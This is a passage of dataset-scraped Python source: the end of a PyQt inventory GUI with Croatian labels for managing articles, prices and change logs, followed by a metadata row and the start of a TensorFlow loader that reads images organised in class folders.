" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
cancel.setFixedWidth(200)
cancel.setIcon(QtGui.QIcon('slOdustani.png'))
self.ok.clicked.connect(self.on_click)
cancel.clicked.connect(self.art_name.clear)
cancel.clicked.connect(self.art_cost.clear)
cancel.clicked.connect(self.art_count.clear)
cancel.clicked.connect(self.art_code.clear)
cancel.clicked.connect(self.artKat.clear)
self.stack1.setLayout(layout)
self.artInfo = QLabel()
layout.addRow("KATEGORIJA: 1- Piฤe 2- Meso 3- Pizza",self.artInfo)
self.artSifra = QLabel()
layout.addRow("ล IFRE: 1-16= Piฤe 17-32=Meso 33-48=Pizza",self.artSifra)
#dodaj
def on_click(self):
now = datetime.datetime.now()
art_name_inp = self.art_name.text().replace(' ','_').lower()
art_count_inp = int(self.art_count.text())
art_cost_inp = int(self.art_cost.text())
art_code_inp = int(self.art_code.text())
art_kat_inp = int(self.artKat.text())
art_add_date_time = now.strftime("%Y-%m-%d %H:%M")
d = ad.insert_prod(art_name_inp,art_count_inp,art_cost_inp,art_code_inp,art_kat_inp,art_add_date_time)
print(d)
def stack2UI(self):
layout = QHBoxLayout()
tabs = QTabWidget()
self.tab1 = QWidget()
self.tab2 = QWidget()
self.tab3 = QWidget()
self.tab4 = QWidget()
self.tab5 = QWidget()
tabs.addTab(self.tab1, 'DODAJ KOLIČINU')
tabs.addTab(self.tab2, 'SMANJI KOLIČINU')
tabs.addTab(self.tab4, 'IZMIJENI CIJENU')
tabs.addTab(self.tab5, 'IZMIJENI ŠIFRU')
tabs.addTab(self.tab3, 'IZBRIŠI ARTIKAL')
self.tab1UI()
self.tab2UI()
self.tab3UI()
self.tab4UI()
self.tab5UI()
layout.addWidget(tabs)
self.stack2.setLayout(layout)
def tab1UI(self):
layout = QFormLayout()
self.ok_add = QPushButton('DODAJ', self)
cancel = QPushButton('PONIŠTI', self)
self.art_name_add = QLineEdit()
layout.addRow("ARTIKAL", self.art_name_add)
self.art_count_add = QLineEdit()
layout.addRow("KOLIČINA ZA DODAT", self.art_count_add)
layout.addWidget(self.ok_add)
layout.addWidget(cancel)
self.tab1.setLayout(layout)
self.art_name_add.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_count_add.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_name_add.setFixedWidth(350)
self.art_count_add.setFixedWidth(200)
self.ok_add.clicked.connect(self.call_add)
cancel.clicked.connect(self.art_name_add.clear)
cancel.clicked.connect(self.art_count_add.clear)
self.ok_add.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.ok_add.setFixedWidth(230)
self.ok_add.setIcon(QtGui.QIcon('noviunos.png'))
cancel.setFixedWidth(230)
cancel.setIcon(QtGui.QIcon('slOdustani.png'))
cancel.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
def tab2UI(self):
layout = QFormLayout()
self.ok_red = QPushButton('ODUZMI', self)
cancel = QPushButton('PONIŠTI', self)
self.art_name_red = QLineEdit()
layout.addRow("ARTIKAL", self.art_name_red)
self.art_count_red = QLineEdit()
layout.addRow("KOLIČINA ZA SMANJIT", self.art_count_red)
layout.addWidget(self.ok_red)
layout.addWidget(cancel)
self.tab2.setLayout(layout)
self.art_name_red.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_count_red.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_name_red.setFixedWidth(350)
self.art_count_red.setFixedWidth(200)
self.ok_red.clicked.connect(self.call_red)
cancel.clicked.connect(self.art_name_red.clear)
cancel.clicked.connect(self.art_count_red.clear)
self.ok_red.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.ok_red.setFixedWidth(230)
self.ok_red.setIcon(QtGui.QIcon('minus.png'))
cancel.setFixedWidth(230)
cancel.setIcon(QtGui.QIcon('slOdustani.png'))
cancel.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
def tab3UI(self):
layout = QFormLayout()
self.ok_del = QPushButton('IZBRIŠI', self)
cancel = QPushButton('PONIŠTI', self)
self.art_name_del = QLineEdit()
layout.addRow("ARTIKAL", self.art_name_del)
self.art_code_del = QLineEdit()
layout.addRow("ili ŠIFRA", self.art_code_del)
layout.addWidget(self.ok_del)
layout.addWidget(cancel)
self.tab3.setLayout(layout)
self.art_name_del.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_code_del.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_name_del.setFixedWidth(350)
self.art_code_del.setFixedWidth(200)
self.ok_del.clicked.connect(self.call_del)
cancel.clicked.connect(self.art_name_del.clear)
cancel.clicked.connect(self.art_code_del.clear)
self.ok_del.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.ok_del.setFixedWidth(230)
self.ok_del.setIcon(QtGui.QIcon('brisanje.png'))
cancel.setFixedWidth(230)
cancel.setIcon(QtGui.QIcon('slOdustani.png'))
cancel.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
def tab4UI(self):
layout = QFormLayout()
self.btn_izmj = QPushButton('IZMJENI', self)
cancel = QPushButton('PONIŠTI', self)
self.art_name_izmj = QLineEdit()
layout.addRow("ARTIKAL", self.art_name_izmj)
self.art_count_izmj = QLineEdit()
layout.addRow("NOVA CIJENA", self.art_count_izmj)
layout.addWidget(self.btn_izmj)
layout.addWidget(cancel)
self.tab4.setLayout(layout)
self.art_name_izmj.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_count_izmj.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_name_izmj.setFixedWidth(350)
self.art_count_izmj.setFixedWidth(200)
self.btn_izmj.clicked.connect(self.call_izmj)
cancel.clicked.connect(self.art_name_izmj.clear)
cancel.clicked.connect(self.art_count_izmj.clear)
self.btn_izmj.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.btn_izmj.setFixedWidth(230)
self.btn_izmj.setIcon(QtGui.QIcon('change.png'))
cancel.setFixedWidth(230)
cancel.setIcon(QtGui.QIcon('slOdustani.png'))
cancel.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
def tab5UI(self):
layout = QFormLayout()
self.btn_izmj_code = QPushButton('IZMJENI', self)
cancel = QPushButton('PONIŠTI', self)
self.art_code_name = QLineEdit()
layout.addRow("ARTIKAL", self.art_code_name)
self.art_code_izmj = QLineEdit()
layout.addRow("NOVA ŠIFRA", self.art_code_izmj)
layout.addWidget(self.btn_izmj_code)
layout.addWidget(cancel)
self.tab5.setLayout(layout)
self.art_code_name.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_code_izmj.setStyleSheet("background-color: rgb(255, 255, 255);")
self.art_code_name.setFixedWidth(350)
self.art_code_izmj.setFixedWidth(200)
self.btn_izmj_code.clicked.connect(self.call_izmj_code)
cancel.clicked.connect(self.art_code_name.clear)
cancel.clicked.connect(self.art_code_izmj.clear)
self.btn_izmj_code.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.btn_izmj_code.setFixedWidth(230)
self.btn_izmj_code.setIcon(QtGui.QIcon('change.png'))
cancel.setFixedWidth(230)
cancel.setIcon(QtGui.QIcon('slOdustani.png'))
cancel.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
# delete an article (by name or code)
def call_del(self):
now = datetime.datetime.now()
art_del_date_time = now.strftime("%Y-%m-%d %H:%M")
art_name = self.art_name_del.text().replace(' ','_').lower()
art_code = self.art_code_del.text().replace(' ', '_').lower()
ad.remove_art(art_name,art_code,art_del_date_time)
# quantity update (reduce)
def call_red(self):
now = datetime.datetime.now()
art_red_date_time = now.strftime("%Y-%m-%d %H:%M")
art_name = self.art_name_red.text().replace(' ','_').lower()
try:
art_val = -(int(self.art_count_red.text()))
print(art_val)
print(type(art_val))
ad.update_quantity(art_name, art_val, art_red_date_time)
except Exception:
print('Krivi podatak!')
# price change
def call_izmj(self):
now = datetime.datetime.now()
art_red_date_time = now.strftime("%Y-%m-%d %H:%M")
art_name = self.art_name_izmj.text().replace(' ', '_').lower()
try:
art_cost = (int(self.art_count_izmj.text()))
print(art_cost)
print(type(art_cost))
ad.update_cost(art_name, art_cost, art_red_date_time)
except Exception:
print('Krivi podatak!')
def call_izmj_code(self):
art_name = self.art_code_name.text().replace(' ', '_').lower()
try:
art_code = (int(self.art_code_izmj.text()))
print(art_code)
print(type(art_code))
ad.update_code(art_name, art_code)
except Exception:
print('Krivi podatak!')
# add quantity
def call_add(self):
now = datetime.datetime.now()
art_call_add_date_time = now.strftime("%Y-%m-%d %H:%M")
art_name = self.art_name_add.text().replace(' ','_').lower()
art_val = int(self.art_count_add.text())
ad.update_quantity(art_name, art_val, art_call_add_date_time)
def stack3UI(self):
table = ad.show_art()
print('prikaz')
print(table)
layout = QVBoxLayout() # no parent here: self already owns the top-level HBox layout
self.srb = QPushButton()
self.srb1 = QPushButton()
self.srb.setText("PRETRAลฝI")
self.srb1.setText("DOHVATI ARTIKLE")
self.View = QTableWidget()
self.lbl3 = QLabel()
self.lbl_conf_text = QLabel()
self.lbl_conf_text.setText("PRETRAลฝI:")
self.lbl_conf_text.setContentsMargins(20,10,0,0)
self.conf_text = QLineEdit()
self.conf_text.setStyleSheet("background-color: rgb(255, 255, 255);")
self.conf_text.setPlaceholderText("Unesi naziv artikla ili poฤetno slovo...")
self.conf_text.setFixedWidth(320)
self.conf_text.setContentsMargins(0,10,0,10)
self.View.setColumnCount(4)
self.View.setColumnWidth(0, 250)
self.View.setColumnWidth(1, 200)
self.View.setColumnWidth(2, 200)
self.View.setColumnWidth(3, 200)
self.View.setStyleSheet("background-color: rgb(255, 255, 255);")
self.View.horizontalScrollBar().setStyleSheet("background-color: rbg(136, 136 , 136);")
self.View.verticalScrollBar().setStyleSheet("background-color: rbg(136, 136 , 136);")
self.View.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.View.setHorizontalHeaderLabels(["ARTIKAL", "KOLIČINA", "CIJENA", "ŠIFRA"])
self.View.setSortingEnabled(True)
self.View.insertRow(0)
layout.addWidget(self.View)
layout.addWidget(self.lbl_conf_text)
layout.addWidget(self.conf_text)
layout.addWidget(self.srb)
layout.addWidget(self.srb1)
layout.addWidget(self.lbl3)
self.srb.clicked.connect(self.show_search)
self.srb1.clicked.connect(self.show_search)
self.stack3.setLayout(layout)
self.srb.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.srb.setFixedWidth(230)
self.srb.setIcon(QtGui.QIcon('search.png'))
self.srb1.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.srb1.setFixedWidth(230)
self.srb1.setIcon(QtGui.QIcon('grab.png'))
def stack4UI(self):
layout = QVBoxLayout()
self.srt = QPushButton()
self.srt.setText("DOHVATI LOGOVE")
self.Trans = QTableWidget()
self.lbl4 = QLabel()
self.trans_text = QLineEdit()
self.trans_text.setDisabled(True)
self.Trans.setColumnCount(6)
self.Trans.setColumnWidth(0, 150)
self.Trans.setColumnWidth(1, 150)
self.Trans.setColumnWidth(2, 150)
self.Trans.setColumnWidth(3, 100)
self.Trans.setColumnWidth(4, 100)
self.Trans.setColumnWidth(5, 500)
self.Trans.setStyleSheet("background-color: rgb(255, 255, 255);")
self.Trans.horizontalScrollBar().setStyleSheet("background-color: rbg(136, 136 , 136);")
self.Trans.verticalScrollBar().setStyleSheet("background-color: rbg(136, 136 , 136);")
self.Trans.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.Trans.setSortingEnabled(True)
self.Trans.setHorizontalHeaderLabels(["LOG ID", "ARTIKAL ili ŠIFRA", "NAREDBA", "DATUM", "VRIJEME", "DETALJI"])
self.Trans.insertRow(0)
self.Trans.setRowHeight(0, 50)
layout.addWidget(self.Trans)
layout.addWidget(self.trans_text)
layout.addWidget(self.srt)
layout.addWidget(self.lbl4)
self.srt.clicked.connect(self.show_trans_history)
self.stack4.setLayout(layout)
self.srt.setStyleSheet("QPushButton {\n"
" font: 14pt \"Franklin Gothic Medium\";\n"
" color: #333;\n"
" border: 2px solid #555;\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }; "
"")
self.srt.setFixedWidth(230)
self.srt.setIcon(QtGui.QIcon('grab.png'))
# search
def show_search(self):
if self.View.rowCount()>1:
for i in range(1,self.View.rowCount()):
self.View.removeRow(1)
x_act = ad.show_art()
x = []
if self.conf_text.text() != '':
for i in range(0,len(x_act)):
a = list(x_act[i])
if self.conf_text.text().lower() in a[0].lower():
x.append(a)
else:
x = ad.show_art()
if len(x)!=0:
for i in range(1,len(x)+1):
self.View.insertRow(i)
a = list(x[i-1])
self.View.setItem(i, 0, QTableWidgetItem(a[0].replace('_',' ').upper()))
self.View.setItem(i, 1, QTableWidgetItem(str(a[1])))
self.View.setItem(i, 2, QTableWidgetItem(str(a[2])))
self.View.setItem(i, 3, QTableWidgetItem(str(a[3])))
self.View.setRowHeight(i, 50)
self.lbl3.setText('Trenutno stanje artikla.')
else:
self.lbl3.setText('Nema podatka u bazi.')
# transaction log view
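# Assumed format of one line in logovi.txt (the writer lives in artiklidb,
# which is not shown here), inferred from the split(" ") indexing below:
#   <artikal> <vrijednost1> <vrijednost2> <YYYY-MM-DD> <HH:MM> <NAREDBA> <kraj>
# i.e. name at [0], command at [-2], date/time at [3]/[4].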
def show_trans_history(self):
if self.Trans.rowCount()>1:
for i in range(1,self.Trans.rowCount()):
self.Trans.removeRow(1)
path = os.path.join(os.path.dirname(os.path.realpath(__file__)),'logovi.txt')
if os.path.exists(path):
tsearch = open(path, 'r')
x_c = tsearch.readlines()
tsearch.close()
x = []
if self.trans_text.text() != '':
key = self.trans_text.text()
for i in range(0,len(x_c)):
a = x_c[i].split(" ")
name = a[0]
action = a[-2]
if (key.lower() in name.lower()) or (key.lower() in action.lower()):
x.append(x_c[i]) # keep the raw line: it is split(" ") again below
else:
x = x_c.copy()
x.sort(key=lambda line: line[4]) # sort once, not once per element
print(x)
tid = 1
for i in range(1,len(x)+1):
self.Trans.insertRow(i)
a = x[i-1].split(" ")
if a[-2] == 'UPDATE':
p = 'Izmjenjena početna količina: '+a[1]+', nova količina: '+a[2]
elif a[-2] == 'INSERT':
p = 'Artikal dodan sa količinom: '+a[1]+' i cijenom: '+a[2]
elif a[-2] == 'REMOVE':
p = 'Izbrisan artikal'
else:
p = 'Ništa'
self.Trans.setItem(i, 0, QTableWidgetItem(str(tid)))
self.Trans.setItem(i, 1, QTableWidgetItem(a[0].replace('_',' ')))
self.Trans.setItem(i, 2, QTableWidgetItem(a[-2]))
self.Trans.setItem(i, 3, QTableWidgetItem(a[3]))
self.Trans.setItem(i, 4, QTableWidgetItem(a[4]))
self.Trans.setItem(i, 5, QTableWidgetItem(p))
self.Trans.setRowHeight(i, 50)
tid += 1
self.lbl4.setText('Logovi izmjena.')
else:
self.lbl4.setText('Nije pronađen podatak.')
def display(self, i):
self.Stack.setCurrentIndex(i)
if __name__ == '__main__':
import sys
app = QtWidgets.QApplication(sys.argv)
login = Login()
if login.exec_() == QtWidgets.QDialog.Accepted:
window = Glavni()
sys.exit(app.exec_())
| [
"[email protected]"
] | |
ac2140d66e608e2720d3249c509e35216dae3be1 | 4757bfab7c7dc2e4949352b697d71c2dd42e12df | /datasets/image_folder.py | a8a20b987cba659bc6cc62e33e3cb956b1112711 | [] | no_license | rwightman/tensorflow-models-slim | bfb85b5725c6f7a73764af6d65f131eb72c716f0 | c4e4729e36d4c596df5f5d952474537792fff131 | refs/heads/master | 2021-08-14T15:23:53.313910 | 2017-11-16T03:48:12 | 2017-11-16T03:48:12 | 110,747,821 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,596 | py | # Copyright 2017 Ross Wightman. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import os
import os.path
import re
IMG_EXTENSIONS = ['.png', '.jpg', '.jpeg']
def natural_key(string_):
"""See http://www.codinghorror.com/blog/archives/001018.html"""
return [int(s) if s.isdigit() else s for s in re.split(r'(\d+)', string_.lower())]
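# e.g. natural_key('img10.png') -> ['img', 10, '.png'], so 'img2.png' sorts
# before 'img10.png' (numeric runs compare as integers).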
def find_images_and_targets(
folder,
types=IMG_EXTENSIONS,
class_to_idx=None,
has_background=False,
leaf_name_only=True,
sort=True):
if class_to_idx is None:
class_to_idx = dict()
build_class_idx = True
else:
build_class_idx = False
labels = []
filenames = []
for root, subdirs, files in os.walk(folder, topdown=False):
rel_path = os.path.relpath(root, folder) if (root != folder) else ''
label = os.path.basename(rel_path) if leaf_name_only else rel_path.replace(os.path.sep, '_')
if build_class_idx and not subdirs:
class_to_idx[label] = 0
for f in files:
base, ext = os.path.splitext(f)
if ext.lower() in types:
filenames.append(os.path.join(root, f))
labels.append(label)
if build_class_idx:
classes = sorted(class_to_idx.keys(), key=natural_key)
for i, c in enumerate(classes):
class_to_idx[c] = i + 1 if has_background else i
images_and_targets = zip(filenames, [class_to_idx[l] for l in labels])
if sort:
images_and_targets = sorted(images_and_targets, key=lambda k: natural_key(k[0]))
if build_class_idx:
return images_and_targets, classes, class_to_idx
else:
return images_and_targets
def _load_image(filename):
image_string = tf.read_file(filename)
image_decoded = tf.image.decode_jpeg(image_string, channels=3)
image_decoded = tf.image.convert_image_dtype(image_decoded, dtype=tf.float32)
return image_decoded
class DatasetImageFolder:
""" Dataset for reading images organized in folders by class.
This dataset uses the tf.data.Dataset iterators and directly loads images
from files in folders instead of relying on TFRecords format.
By default the dataset is setup to work out of the box with imagenet for
TF models that have 1001 classes and a background class at 0.
"""
def __init__(
self, root,
split='train',
num_classes=1001,
has_background=True,
labels_file='./datasets/imagenet_lsvrc_2015_synsets.txt'):
if labels_file and os.path.exists(labels_file):
class_to_idx = {}
classes = []
with open(labels_file) as fp:
for i, label in enumerate(map(str.strip, fp)):
class_to_idx[label] = i + 1 if has_background else i
classes.append(label)
images_and_targets = find_images_and_targets(
root, class_to_idx=class_to_idx)
else:
images_and_targets, classes, class_to_idx = find_images_and_targets(
root, has_background=has_background)
if len(images_and_targets) == 0:
raise (RuntimeError(
"Found 0 images in subfolders of: " + root + "\n"
"Supported image extensions are: " + ",".join(IMG_EXTENSIONS)))
self.root = root
self.split = split
self.num_classes = num_classes
images, targets = zip(*images_and_targets)
self.images = images
self.targets = targets
self.num_samples = len(images)
self.classes = classes
self.class_to_idx = class_to_idx
